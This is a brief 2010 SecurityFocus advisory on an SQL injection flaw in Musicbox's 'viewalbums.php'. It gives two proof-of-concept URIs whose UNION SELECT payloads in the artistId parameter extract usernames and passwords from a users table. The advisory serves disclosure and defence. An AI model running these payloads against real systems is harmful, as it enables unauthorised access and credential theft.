Musicbox 'viewalbums.php' SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
http://www.example.com/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--


 

Privacy Statement
Copyright 2010, SecurityFocus